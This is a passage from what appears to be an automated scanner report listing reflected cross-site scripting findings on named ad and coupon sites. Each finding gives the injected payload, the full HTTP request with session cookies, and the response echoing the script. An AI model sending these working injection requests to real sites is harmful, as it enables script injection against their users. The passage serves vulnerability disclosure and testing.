Set-Cookie: wfivefivec=0adf278a-5c84-4e01-8d4e-00e9b3c85ea1;Path=/;Domain=.w55c.net;Expires=Thu, 31-Oct-13 02:18:40 GMT
Cache-Control: no-store
pragma: no-cache
Content-Type: text/html;charset=ISO-8859-1
Via: 1.1 ttn161182010000 (MII-APC/2.1)
Content-Length: 377

<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=810249"></IFRAME><br/>
<script type="text/javascript" src="http://cti.w55c.net/ct/creative_add_on.js?w=300&h=250&pos=top-right&zindex=0&ci=0CV8fZRXhA&ei=OPENX&ob=13e929"><script>alert(1)</script>558d47ebcdd">
...[SNIP]...

3.35. http://connexity.net/c/cse [E parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://connexity.net
Path:   /c/cse

Issue detail

The value of the E request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7e5e'%3balert(1)//5cf0b169852 was submitted in the E parameter. This input was echoed as a7e5e';alert(1)//5cf0b169852 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/cse?a=J&b=559602&E=a7e5e'%3balert(1)//5cf0b169852&F=1&H=90&J=http%3A%2F%2Fwww.politico.com%2Findex.html&L=&S=15&V=2&W=728 HTTP/1.1
Host: connexity.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html

Response

HTTP/1.1 200 OK
Server: Connexity
Date: Tue, 01 Nov 2011 01:36:58 GMT
Content-Type: text/html
Connection: keep-alive
P3P: CP="CAO PSA OUR",an.pp="http://www.connexity.com/privacy",an.oo="http://www.connexity.com/privacy",an.bt="N"
Set-Cookie: u=e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137; Expires=Sun, 30-Oct-2016 01:36:58 GMT; domain=connexity.net; path=/
Cache-Control: no-store, proxy-revalidate, no-cache="set-cookie", max-age=-1, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Length: 6974

<!-- iframe-pre-script.inc.html -->
<html><head>
<script type="text/javascript">var startstamp = new Date();var timestamps = [];function sw(label){timestamps.push([label,new Date()]);}</script><script type="text/javascript">
var sid='15';
var fid='1';
var width=728;
var height=90;
var tid='0-3fd05f20';
var loadtest=false;
var nextOp = 'I';
var TPC='a7e5e';alert(1)//5cf0b169852';
var lsoAllowed=false;
var lsoRefresh=true;
var flashSupported=true;
var optOutPresent=false;
var UID='e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137';
var cdn_root='t.cxt.ms/';
var cse_ro
...[SNIP]...

3.36. http://connexity.net/c/cse [J parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://connexity.net
Path:   /c/cse

Issue detail

The value of the J request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2db3'%3balert(1)//e59c7adcdb7 was submitted in the J parameter. This input was echoed as d2db3';alert(1)//e59c7adcdb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/cse?a=J&b=559602&E=&F=1&H=90&J=http%3A%2F%2Fwww.politico.com%2Findex.htmld2db3'%3balert(1)//e59c7adcdb7&L=&S=15&V=2&W=728 HTTP/1.1
Host: connexity.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html

Response

HTTP/1.1 200 OK
Server: Connexity
Date: Tue, 01 Nov 2011 01:36:59 GMT
Content-Type: text/html
Connection: keep-alive
P3P: CP="CAO PSA OUR",an.pp="http://www.connexity.com/privacy",an.oo="http://www.connexity.com/privacy",an.bt="N"
Set-Cookie: u=e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137; Expires=Sun, 30-Oct-2016 01:36:59 GMT; domain=connexity.net; path=/
Cache-Control: no-store, proxy-revalidate, no-cache="set-cookie", max-age=-1, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Length: 6976

<!-- iframe-pre-script.inc.html -->
<html><head>
<script type="text/javascript">var startstamp = new Date();var timestamps = [];function sw(label){timestamps.push([label,new Date()]);}</script><scri
...[SNIP]...
UID='e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137';
var cdn_root='t.cxt.ms/';
var cse_root='connexity.net/c/cse';
var ssl=false;
var ref='empty';
var refr='http://www.politico.com/index.htmld2db3';alert(1)//e59c7adcdb7';
</script>
...[SNIP]...

3.37. http://connexity.net/c/cse [L parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://connexity.net
Path:   /c/cse

Issue detail

The value of the L request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8753f'%3balert(1)//024f217ec36 was submitted in the L parameter. This input was echoed as 8753f';alert(1)//024f217ec36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/cse?a=J&b=559602&E=&F=1&H=90&J=http%3A%2F%2Fwww.politico.com%2Findex.html&L=8753f'%3balert(1)//024f217ec36&S=15&V=2&W=728 HTTP/1.1
Host: connexity.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html

Response

HTTP/1.1 200 OK
Server: Connexity
Date: Tue, 01 Nov 2011 01:36:59 GMT
Content-Type: text/html
Connection: keep-alive
P3P: CP="CAO PSA OUR",an.pp="http://www.connexity.com/privacy",an.oo="http://www.connexity.com/privacy",an.bt="N"
Set-Cookie: u=e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137; Expires=Sun, 30-Oct-2016 01:36:59 GMT; domain=connexity.net; path=/
Cache-Control: no-store, proxy-revalidate, no-cache="set-cookie", max-age=-1, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Length: 6971

<!-- iframe-pre-script.inc.html -->
<html><head>
<script type="text/javascript">var startstamp = new Date();var timestamps = [];function sw(label){timestamps.push([label,new Date()]);}</script><scri
...[SNIP]...
flashSupported=true;
var optOutPresent=false;
var UID='e97b3657a29665df-064a2961ba5c8be1-2175fb3ce1138137';
var cdn_root='t.cxt.ms/';
var cse_root='connexity.net/c/cse';
var ssl=false;
var ref='8753f';alert(1)//024f217ec36';
var refr='http://www.politico.com/index.html';
</script>
...[SNIP]...

3.38. http://couponbar.coupons.com/adblob.asp [AdSize parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://couponbar.coupons.com
Path:   /adblob.asp

Issue detail

The value of the AdSize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12a72'%3balert(1)//0adbbbb611e was submitted in the AdSize parameter. This input was echoed as 12a72';alert(1)//0adbbbb611e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adblob.asp?AdSize=160x21012a72'%3balert(1)//0adbbbb611e&pzn=13306iq3710&req=1320087850320&zip=&did=&spage=.com/&npage=1 HTTP/1.1
Host: couponbar.coupons.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/
Cookie: UserInfo=mac=H&uid=H&acc=EASRMUBAA&isPrinterSupported=0&groupid=0%2C0%2C0&nid=H&ZIP=&rememberMeCookie=0&UserKey=%2Fh%2FDs1ZHTOB%2BrsASEvi1T8OW%2FL9Hb09kTHVDJEZyT21NYU5pQ2tB&cbStatus=0&isInitialSSOReg=0&euid=&appid=&redirectToLamp=0; SessionInfo=TrackingID=ALK10311204081DC0CB6203106106&SI=iG0O=Fwb!hWWGW_iAGnzERqwKPofIpMqfJf:|:@OZAq=O:|:T~lmga.OD=%:|:H9VZRP83=A:|:kG~ws8_=C:|:JIC^=K:|:PUK3SCG5pQ=e$:|:TDz%^YEZA=h6:|:Q!f=g:|:9XV=w!sHZap__Upbti.6_MpIZuJ5XjWdv5:|:9.tYWSpol!94~raTNO%=o:|:M5eyS%%_=_:|:PS.=l:|:PNd1sDF$ARB=44:|:ftCBkH=$:|:nXLojpd=7:|:n1AH3a=B:|:7BP9te1=z:|:MBIAkBF=_:|:hIJ7=W:|:%~Y@t4r.0=f:|:F@E%^=NU.4Jf&sC=yxzLLsYRc=fJ:|:glc_dul5jyE~8=D1:|:63ihezy%~F=0%b/3O/csZPPsJ4o; __utma=94333583.1002706944.1320087848.1320087848.1320087848.1; __utmb=94333583.3.9.1320087848; __utmc=94333583; __utmz=94333583.1320087848.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:04:17 GMT
Server: Microsoft-IIS/6.0
p3p: CP="ALL DSP COR LAW CURa ADMa DEVa TAIa IVAi CONi OUR BUS IND PHY ONL COM NAV DEM OTC"
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 895
Content-Type: text/html
Expires: Mon, 31 Oct 2011 19:03:17 GMT
Cache-control: no-cache
CI_SVR_ID: 11/69
Set-Cookie: NSC_DpvqpoCbs-IUUQ=ffffffff0916155445525d5f4f58455e445a4a423660;expires=Mon, 31-Oct-2011 19:14:17 GMT;path=/;httponly

<html><head>
<title>Coupons.com</title>
</head>
<body topmargin='0' leftmargin='0' marginheight='0' marginwidth='0'>
<SCRIPT TYPE='text/javascript'>document.write('<!-- BEGIN STANDARD TAG - 160 x 21012a72';alert(1)//0adbbbb611e - SITE CODE REQUIRED : SECTION CODE REQUIRED - DO NOT MODIFY -->
...[SNIP]...

3.39. http://couponbar.coupons.com/adblob.asp [npage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://couponbar.coupons.com
Path:   /adblob.asp

Issue detail

The value of the npage request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 783ab'%3balert(1)//16595f62d8f was submitted in the npage parameter. This input was echoed as 783ab';alert(1)//16595f62d8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adblob.asp?AdSize=160x210&pzn=13306iq3710&req=1320087850320&zip=&did=&spage=.com/&npage=1783ab'%3balert(1)//16595f62d8f HTTP/1.1
Host: couponbar.coupons.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/
Cookie: UserInfo=mac=H&uid=H&acc=EASRMUBAA&isPrinterSupported=0&groupid=0%2C0%2C0&nid=H&ZIP=&rememberMeCookie=0&UserKey=%2Fh%2FDs1ZHTOB%2BrsASEvi1T8OW%2FL9Hb09kTHVDJEZyT21NYU5pQ2tB&cbStatus=0&isInitialSSOReg=0&euid=&appid=&redirectToLamp=0; SessionInfo=TrackingID=ALK10311204081DC0CB6203106106&SI=iG0O=Fwb!hWWGW_iAGnzERqwKPofIpMqfJf:|:@OZAq=O:|:T~lmga.OD=%:|:H9VZRP83=A:|:kG~ws8_=C:|:JIC^=K:|:PUK3SCG5pQ=e$:|:TDz%^YEZA=h6:|:Q!f=g:|:9XV=w!sHZap__Upbti.6_MpIZuJ5XjWdv5:|:9.tYWSpol!94~raTNO%=o:|:M5eyS%%_=_:|:PS.=l:|:PNd1sDF$ARB=44:|:ftCBkH=$:|:nXLojpd=7:|:n1AH3a=B:|:7BP9te1=z:|:MBIAkBF=_:|:hIJ7=W:|:%~Y@t4r.0=f:|:F@E%^=NU.4Jf&sC=yxzLLsYRc=fJ:|:glc_dul5jyE~8=D1:|:63ihezy%~F=0%b/3O/csZPPsJ4o; __utma=94333583.1002706944.1320087848.1320087848.1320087848.1; __utmb=94333583.3.9.1320087848; __utmc=94333583; __utmz=94333583.1320087848.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:05:08 GMT
Server: Microsoft-IIS/6.0
p3p: CP="ALL DSP COR LAW CURa ADMa DEVa TAIa IVAi CONi OUR BUS IND PHY ONL COM NAV DEM OTC"
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 867
Content-Type: text/html
Expires: Mon, 31 Oct 2011 19:04:08 GMT
Cache-control: no-cache
CI_SVR_ID: 11/69
Set-Cookie: NSC_DpvqpoCbs-IUUQ=ffffffff0916155445525d5f4f58455e445a4a423660;expires=Mon, 31-Oct-2011 19:15:08 GMT;path=/;httponly

<html><head>
<title>Coupons.com</title>
</head>
<body topmargin='0' leftmargin='0' marginheight='0' marginwidth='0'>
<SCRIPT TYPE='text/javascript'>document.write('<!-- BEGIN STANDARD TAG - 160 x
...[SNIP]...
<SCRIPT TYPE="text/javascript" SRC="http://ad.coupons.com/st?ad_type=ad&ad_size=160x210&noBT=0&npage=1783ab';alert(1)//16595f62d8f&spage=.com/&btcat=100&entity=29890&site_code=13306iq3710&pid=13306&zid=iq37&nid=10&section_code=INSERT_SECTION_CODE_HERE&user=wocbar&p84521=E10312011D1205D705547512&c84521=xXVKRv2iYdqnFzPWHmOrzbUxXiv1
...[SNIP]...

3.40. http://couponbar.coupons.com/adblob.asp [pzn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://couponbar.coupons.com
Path:   /adblob.asp

Issue detail

The value of the pzn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e09b'%3balert(1)//407021f8be4 was submitted in the pzn parameter. This input was echoed as 4e09b';alert(1)//407021f8be4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adblob.asp?AdSize=160x210&pzn=13306iq37104e09b'%3balert(1)//407021f8be4&req=1320087850320&zip=&did=&spage=.com/&npage=1 HTTP/1.1
Host: couponbar.coupons.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/
Cookie: UserInfo=mac=H&uid=H&acc=EASRMUBAA&isPrinterSupported=0&groupid=0%2C0%2C0&nid=H&ZIP=&rememberMeCookie=0&UserKey=%2Fh%2FDs1ZHTOB%2BrsASEvi1T8OW%2FL9Hb09kTHVDJEZyT21NYU5pQ2tB&cbStatus=0&isInitialSSOReg=0&euid=&appid=&redirectToLamp=0; SessionInfo=TrackingID=ALK10311204081DC0CB6203106106&SI=iG0O=Fwb!hWWGW_iAGnzERqwKPofIpMqfJf:|:@OZAq=O:|:T~lmga.OD=%:|:H9VZRP83=A:|:kG~ws8_=C:|:JIC^=K:|:PUK3SCG5pQ=e$:|:TDz%^YEZA=h6:|:Q!f=g:|:9XV=w!sHZap__Upbti.6_MpIZuJ5XjWdv5:|:9.tYWSpol!94~raTNO%=o:|:M5eyS%%_=_:|:PS.=l:|:PNd1sDF$ARB=44:|:ftCBkH=$:|:nXLojpd=7:|:n1AH3a=B:|:7BP9te1=z:|:MBIAkBF=_:|:hIJ7=W:|:%~Y@t4r.0=f:|:F@E%^=NU.4Jf&sC=yxzLLsYRc=fJ:|:glc_dul5jyE~8=D1:|:63ihezy%~F=0%b/3O/csZPPsJ4o; __utma=94333583.1002706944.1320087848.1320087848.1320087848.1; __utmb=94333583.3.9.1320087848; __utmc=94333583; __utmz=94333583.1320087848.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:04:26 GMT
Server: Microsoft-IIS/6.0
p3p: CP="ALL DSP COR LAW CURa ADMa DEVa TAIa IVAi CONi OUR BUS IND PHY ONL COM NAV DEM OTC"
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 867
Content-Type: text/html
Expires: Mon, 31 Oct 2011 19:03:26 GMT
Cache-control: no-cache
CI_SVR_ID: 11/69
Set-Cookie: NSC_DpvqpoCbs-IUUQ=ffffffff0916155445525d5f4f58455e445a4a423660;expires=Mon, 31-Oct-2011 19:14:26 GMT;path=/;httponly

<html><head>
<title>Coupons.com</title>
</head>
<body topmargin='0' leftmargin='0' marginheight='0' marginwidth='0'>
<SCRIPT TYPE='text/javascript'>document.write('<!-- BEGIN STANDARD TAG - 160 x
...[SNIP]...
<SCRIPT TYPE="text/javascript" SRC="http://ad.coupons.com/st?ad_type=ad&ad_size=160x210&noBT=0&npage=1&spage=.com/&btcat=100&entity=29890&site_code=13306iq37104e09b';alert(1)//407021f8be4&pid=13306&zid=iq37&nid=10&section_code=INSERT_SECTION_CODE_HERE&user=wocbar&p84521=E10312011D1204D705547512&c84521=xXVKRv2iYdqnFMicjKyRMeEnrVUqG&p84965=E10312011D1204D533424020&c84965=qY6fvauqC5k41BjR
...[SNIP]...

3.41. http://couponbar.coupons.com/adblob.asp [spage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://couponbar.coupons.com
Path:   /adblob.asp

Issue detail

The value of the spage request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4adc'%3balert(1)//eaf4aa2dc00 was submitted in the spage parameter. This input was echoed as e4adc';alert(1)//eaf4aa2dc00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adblob.asp?AdSize=160x210&pzn=13306iq3710&req=1320087850320&zip=&did=&spage=.com/e4adc'%3balert(1)//eaf4aa2dc00&npage=1 HTTP/1.1
Host: couponbar.coupons.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/
Cookie: UserInfo=mac=H&uid=H&acc=EASRMUBAA&isPrinterSupported=0&groupid=0%2C0%2C0&nid=H&ZIP=&rememberMeCookie=0&UserKey=%2Fh%2FDs1ZHTOB%2BrsASEvi1T8OW%2FL9Hb09kTHVDJEZyT21NYU5pQ2tB&cbStatus=0&isInitialSSOReg=0&euid=&appid=&redirectToLamp=0; SessionInfo=TrackingID=ALK10311204081DC0CB6203106106&SI=iG0O=Fwb!hWWGW_iAGnzERqwKPofIpMqfJf:|:@OZAq=O:|:T~lmga.OD=%:|:H9VZRP83=A:|:kG~ws8_=C:|:JIC^=K:|:PUK3SCG5pQ=e$:|:TDz%^YEZA=h6:|:Q!f=g:|:9XV=w!sHZap__Upbti.6_MpIZuJ5XjWdv5:|:9.tYWSpol!94~raTNO%=o:|:M5eyS%%_=_:|:PS.=l:|:PNd1sDF$ARB=44:|:ftCBkH=$:|:nXLojpd=7:|:n1AH3a=B:|:7BP9te1=z:|:MBIAkBF=_:|:hIJ7=W:|:%~Y@t4r.0=f:|:F@E%^=NU.4Jf&sC=yxzLLsYRc=fJ:|:glc_dul5jyE~8=D1:|:63ihezy%~F=0%b/3O/csZPPsJ4o; __utma=94333583.1002706944.1320087848.1320087848.1320087848.1; __utmb=94333583.3.9.1320087848; __utmc=94333583; __utmz=94333583.1320087848.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:05:00 GMT
Server: Microsoft-IIS/6.0
p3p: CP="ALL DSP COR LAW CURa ADMa DEVa TAIa IVAi CONi OUR BUS IND PHY ONL COM NAV DEM OTC"
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 867
Content-Type: text/html
Expires: Mon, 31 Oct 2011 19:04:00 GMT
Cache-control: no-cache
CI_SVR_ID: 11/69
Set-Cookie: NSC_DpvqpoCbs-IUUQ=ffffffff0916155445525d5f4f58455e445a4a423660;expires=Mon, 31-Oct-2011 19:15:00 GMT;path=/;httponly

<html><head>
<title>Coupons.com</title>
</head>
<body topmargin='0' leftmargin='0' marginheight='0' marginwidth='0'>
<SCRIPT TYPE='text/javascript'>document.write('<!-- BEGIN STANDARD TAG - 160 x
...[SNIP]...
<SCRIPT TYPE="text/javascript" SRC="http://ad.coupons.com/st?ad_type=ad&ad_size=160x210&noBT=0&npage=1&spage=.com/e4adc';alert(1)//eaf4aa2dc00&btcat=100&entity=29890&site_code=13306iq3710&pid=13306&zid=iq37&nid=10&section_code=INSERT_SECTION_CODE_HERE&user=wocbar&p84521=E10312011D1205D705547512&c84521=xXVKRv2iYdqnFzPWHmOrzbUxXiv1d&p84965=E10
...[SNIP]...

3.42. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce2d3"-alert(1)-"15561a177f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.comce2d3"-alert(1)-"15561a177f2/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=605B87974EE3B7D84553DEC5CCF31F92; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:32:00 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.comce2d3"-alert(1)-"15561a177f2/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8
...[SNIP]...

3.43. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 598d5"-alert(1)-"286b77b0405 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794598d5"-alert(1)-"286b77b0405/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AB4A1D48099BCAE3AB902FC6F3BC78C9; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:32:00 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794598d5"-alert(1)-"286b77b0405/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303
...[SNIP]...

3.44. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42202"-alert(1)-"315bbf99bf2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/18497942202"-alert(1)-"315bbf99bf2/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=863AA0BD61A78A7BB73DA7B19CB5C588; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:32:01 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
